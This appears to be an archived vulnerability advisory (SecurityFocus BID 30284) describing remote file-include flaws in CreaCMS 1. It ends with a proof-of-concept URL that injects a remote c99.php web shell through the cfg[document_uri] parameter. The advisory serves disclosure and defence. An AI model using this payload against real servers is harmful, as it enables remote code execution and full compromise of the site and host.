9 lines
No EOL
516 B
Text
9 lines
No EOL
516 B
Text
source: http://www.securityfocus.com/bid/30284/info
|
|
|
|
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
|
|
|
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
|
|
|
|
CreaCMS 1 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://127.0.0.1/c99.php? |